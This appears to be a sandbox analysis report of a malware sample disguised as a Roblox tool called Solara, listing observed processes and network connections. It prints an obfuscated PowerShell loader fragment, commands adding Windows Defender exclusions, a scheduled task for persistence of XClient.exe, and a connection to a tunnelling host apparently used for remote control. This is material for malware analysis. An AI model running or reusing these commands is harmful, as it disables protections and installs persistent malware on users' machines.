(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.9.1927054615\213791461" -childID 8 -isForBrowser -prefsHandle 3528 -prefMapHandle 2824 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5db436d-d670-43de-9d74-57874eabc025} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e7852f2558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.10.303666136\2016900388" -parentBuildID 20221007134813 -prefsHandle 3548 -prefMapHandle 4692 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6e0fb-f892-4356-b074-03fe73e635ca} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e785656d58 rdd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\XClient.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6464.7052.9511635907052121146
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=122.0.2365.52 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdb24e2e98,0x7ffdb24e2ea4,0x7ffdb24e2eb0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.11.1903525523\1222888480" -childID 9 -isForBrowser -prefsHandle 10084 -prefMapHandle 10044 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9376c6cd-f39a-4f3c-93be-d228b2408934} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 10100 1e78560cd58 tab
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1788 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2104 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=3676 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.12.1546401626\2013547121" -childID 10 -isForBrowser -prefsHandle 9848 -prefMapHandle 9820 -prefsLen 26734 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc5c9d42-7063-45e1-8988-320bc0d2fa80} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 9924 1e78d2f5658 tab
C:\Users\Admin\XClient.exe
C:\Users\Admin\XClient.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2108 -ip 2108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 3340
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.201.106:443 | chromewebstore.googleapis.com | tcp |
| GB | 216.58.201.106:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.pki.goog | udp |
| US | 8.8.8.8:53 | i.pki.goog | udp |
| GB | 172.217.169.35:80 | i.pki.goog | tcp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 52.25.243.81:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 81.243.25.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| N/A | 127.0.0.1:49876 | tcp | |
| N/A | 127.0.0.1:49882 | tcp | |
| US | 8.8.8.8:53 | roblox.com | udp |
| GB | 128.116.119.4:80 | roblox.com | tcp |
| GB | 128.116.119.4:80 | roblox.com | tcp |
| US | 8.8.8.8:53 | roblox.com | udp |
| US | 8.8.8.8:53 | roblox.com | udp |
| GB | 128.116.119.4:443 | roblox.com | tcp |
| US | 8.8.8.8:53 | 4.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| NL | 128.116.21.4:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| NL | 128.116.21.4:443 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| DE | 18.66.112.62:443 | css.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | d1kpbbfl4rco16.cloudfront.net | udp |
| US | 8.8.8.8:53 | 4.21.116.128.in-addr.arpa | udp |
| DE | 18.66.112.62:443 | d1kpbbfl4rco16.cloudfront.net | tcp |
| DE | 18.66.112.62:443 | d1kpbbfl4rco16.cloudfront.net | tcp |
| DE | 18.66.112.62:443 | d1kpbbfl4rco16.cloudfront.net | tcp |
| DE | 18.66.112.62:443 | d1kpbbfl4rco16.cloudfront.net | tcp |
| DE | 18.66.112.62:443 | d1kpbbfl4rco16.cloudfront.net | tcp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | d143j4fdqe1jki.cloudfront.net | udp |
| DE | 108.138.7.95:443 | d143j4fdqe1jki.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d143j4fdqe1jki.cloudfront.net | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| DE | 65.9.66.37:443 | js.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | dw04ej0wrfjel.cloudfront.net | udp |
| DE | 18.245.60.3:443 | roblox-api.arkoselabs.com | tcp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
| GB | 128.116.119.4:443 | roblox.com | udp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 65.9.66.37:443 | dw04ej0wrfjel.cloudfront.net | tcp |
| DE | 18.245.60.3:443 | d2w650xp5tniea.cloudfront.net | udp |
| US | 8.8.8.8:53 | 95.7.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.112.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.60.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.66.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dw04ej0wrfjel.cloudfront.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | d1kpbbfl4rco16.cloudfront.net | udp |
| US | 8.8.8.8:53 | metrics.roblox.com | udp |
| US | 8.8.8.8:53 | apis.roblox.com | udp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | udp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | tcp |
| NL | 128.116.21.4:443 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| DE | 18.66.112.83:443 | images.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | dapx4swc8lj69.cloudfront.net | udp |
| US | 8.8.8.8:53 | dapx4swc8lj69.cloudfront.net | udp |
| US | 8.8.8.8:53 | 83.112.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.rbxcdn.com | udp |
| BE | 23.14.90.81:443 | apis.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | a1818.b.akamai.net | udp |
| BE | 23.14.90.81:443 | a1818.b.akamai.net | tcp |
| US | 8.8.8.8:53 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | 81.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1818.b.akamai.net | udp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| NL | 128.116.21.4:443 | auth.roblox.com | tcp |
| NL | 128.116.21.4:443 | auth.roblox.com | tcp |
| NL | 128.116.21.4:443 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 128.116.21.4:443 | auth.roblox.com | tcp |
| NL | 128.116.21.4:443 | auth.roblox.com | tcp |
| NL | 128.116.21.4:443 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | assetgame.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| NL | 128.116.21.4:443 | assetgame.roblox.com | tcp |
| NL | 128.116.21.4:443 | assetgame.roblox.com | tcp |
| NL | 128.116.21.4:443 | assetgame.roblox.com | tcp |
| NL | 128.116.21.4:443 | assetgame.roblox.com | tcp |
| NL | 128.116.21.4:443 | assetgame.roblox.com | udp |
| US | 8.8.8.8:53 | apis.rbxcdn.com | udp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| DE | 18.245.60.3:443 | roblox-api.arkoselabs.com | udp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
| DE | 18.245.60.3:443 | d2w650xp5tniea.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
| DE | 18.245.60.3:443 | d2w650xp5tniea.cloudfront.net | tcp |
| US | 8.8.8.8:53 | a1818.b.akamai.net | udp |
| US | 8.8.8.8:53 | a1818.b.akamai.net | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| GB | 128.116.119.4:443 | roblox.com | udp |
| US | 8.8.8.8:53 | d143j4fdqe1jki.cloudfront.net | udp |
| US | 8.8.8.8:53 | d1kpbbfl4rco16.cloudfront.net | udp |
| US | 8.8.8.8:53 | d1kpbbfl4rco16.cloudfront.net | udp |
| US | 8.8.8.8:53 | d143j4fdqe1jki.cloudfront.net | udp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| US | 8.8.8.8:53 | dw04ej0wrfjel.cloudfront.net | udp |
| US | 8.8.8.8:53 | dapx4swc8lj69.cloudfront.net | udp |
| US | 8.8.8.8:53 | dapx4swc8lj69.cloudfront.net | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | dw04ej0wrfjel.cloudfront.net | udp |
| US | 8.8.8.8:53 | lms.roblox.com | udp |
| NL | 128.116.21.4:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | us-central-default-px.roblox.com | udp |
| US | 8.8.8.8:53 | us-central-default-px.roblox.com | udp |
| NL | 128.116.21.4:443 | us-central-default-px.roblox.com | tcp |
| NL | 128.116.21.4:443 | us-central-default-px.roblox.com | udp |
| US | 8.8.8.8:53 | realtime-signalr.roblox.com | udp |
| NL | 128.116.21.4:443 | realtime-signalr.roblox.com | tcp |
| US | 8.8.8.8:53 | accountsettings.roblox.com | udp |
| NL | 128.116.21.4:443 | accountsettings.roblox.com | tcp |
| US | 8.8.8.8:53 | economy.roblox.com | udp |
| NL | 128.116.21.4:443 | economy.roblox.com | tcp |
| US | 8.8.8.8:53 | friends.roblox.com | udp |
| US | 8.8.8.8:53 | privatemessages.roblox.com | udp |
| US | 8.8.8.8:53 | trades.roblox.com | udp |
| NL | 128.116.21.4:443 | trades.roblox.com | tcp |
| NL | 128.116.21.4:443 | trades.roblox.com | tcp |
| NL | 128.116.21.4:443 | trades.roblox.com | tcp |
| US | 8.8.8.8:53 | thumbnails.roblox.com | udp |
| NL | 128.116.21.4:443 | thumbnails.roblox.com | tcp |
| NL | 128.116.21.4:443 | thumbnails.roblox.com | tcp |
| US | 8.8.8.8:53 | contacts.roblox.com | udp |
| NL | 128.116.21.4:443 | contacts.roblox.com | tcp |
| US | 8.8.8.8:53 | cs.ns1p.net | udp |
| US | 8.8.8.8:53 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-northeast-1d-lms.rbx.com | udp |
| JP | 52.196.248.242:443 | aws-ap-northeast-1d-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | nfd-prod-d-869689544.ap-northeast-1.elb.amazonaws.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | nfd-prod-d-869689544.ap-northeast-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | aws-ap-northeast-1c-lms.rbx.com | udp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| US | 8.8.8.8:53 | mia4-128-116-45-3.roblox.com | udp |
| JP | 35.76.184.243:443 | aws-ap-northeast-1c-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | nfd-prod-c-1199815139.ap-northeast-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | syd1-128-116-51-3.roblox.com | udp |
| US | 128.116.127.3:443 | mia2-128-116-127-3.roblox.com | tcp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| US | 8.8.8.8:53 | waw1-128-116-124-3.roblox.com | udp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| US | 8.8.8.8:53 | fra2-128-116-123-3.roblox.com | udp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| PL | 128.116.124.3:443 | waw1-128-116-124-3.roblox.com | tcp |
| DE | 128.116.123.3:443 | fra2-128-116-123-3.roblox.com | tcp |
| US | 8.8.8.8:53 | nfd-prod-c-1199815139.ap-northeast-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | pulsar.roblox.com | udp |
| US | 8.8.8.8:53 | mia4-128-116-45-3.roblox.com | udp |
| JP | 52.196.248.242:443 | nfd-prod-d-869689544.ap-northeast-1.elb.amazonaws.com | tcp |
| PL | 128.116.124.3:443 | pulsar.roblox.com | tcp |
| US | 8.8.8.8:53 | lhr2-128-116-119-3.roblox.com | udp |
| US | 8.8.8.8:53 | syd1-128-116-51-3.roblox.com | udp |
| US | 8.8.8.8:53 | mia4-128-116-45-3.roblox.com | udp |
| JP | 35.76.184.243:443 | nfd-prod-c-1199815139.ap-northeast-1.elb.amazonaws.com | tcp |
| US | 8.8.8.8:53 | waw1-128-116-124-3.roblox.com | udp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| US | 8.8.8.8:53 | waw1-128-116-124-3.roblox.com | udp |
| GB | 128.116.119.3:443 | lhr2-128-116-119-3.roblox.com | tcp |
| US | 8.8.8.8:53 | syd1-128-116-51-3.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| GB | 128.116.119.3:443 | lhr2-128-116-119-3.roblox.com | tcp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| DE | 18.197.37.72:443 | cs.ns1p.net | tcp |
| GB | 128.116.119.3:443 | lhr2-128-116-119-3.roblox.com | tcp |
| US | 8.8.8.8:53 | fra2-128-116-123-3.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | 3.124.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.248.196.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.123.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.127.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.184.76.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.37.197.18.in-addr.arpa | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| US | 8.8.8.8:53 | pulsar.roblox.com | udp |
| US | 8.8.8.8:53 | lhr2-128-116-119-3.roblox.com | udp |
| US | 8.8.8.8:53 | pulsar.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | tcp |
| US | 8.8.8.8:53 | 3.51.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fra2-128-116-123-3.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| NL | 128.116.21.4:443 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | a4c9427a-pulsar-pweb-4287-639546627.eu-central-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | lhr2-128-116-119-3.roblox.com | udp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | a4c9427a-pulsar-pweb-4287-639546627.eu-central-1.elb.amazonaws.com | udp |
| US | 2.20.12.94:443 | tr.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | a1831.dscd.akamai.net | udp |
| US | 2.20.12.94:443 | a1831.dscd.akamai.net | tcp |
| US | 2.20.12.94:443 | a1831.dscd.akamai.net | tcp |
| US | 2.20.12.94:443 | a1831.dscd.akamai.net | tcp |
| US | 2.20.12.94:443 | a1831.dscd.akamai.net | tcp |
| US | 8.8.8.8:53 | a1831.dscd.akamai.net | udp |
| US | 8.8.8.8:53 | us-central-default-px.roblox.com | udp |
| US | 8.8.8.8:53 | 94.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | anyone-blogging.gl.at.ply.gg | udp |
| NL | 128.116.21.4:443 | presence.roblox.com | tcp |
| NL | 128.116.21.4:443 | presence.roblox.com | tcp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| NL | 128.116.21.4:443 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | 20.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.ns1p.net | udp |
| DE | 18.197.37.72:443 | s.ns1p.net | tcp |
| US | 8.8.8.8:53 | a4c9427a-pulsar-pweb-4287-639546627.eu-central-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | lax2-128-116-116-3.roblox.com | udp |
| US | 128.116.116.3:443 | lax2-128-116-116-3.roblox.com | tcp |
| US | 8.8.8.8:53 | lax2-128-116-116-3.roblox.com | udp |
| US | 8.8.8.8:53 | lax2-128-116-116-3.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | 3.116.116.128.in-addr.arpa | udp |
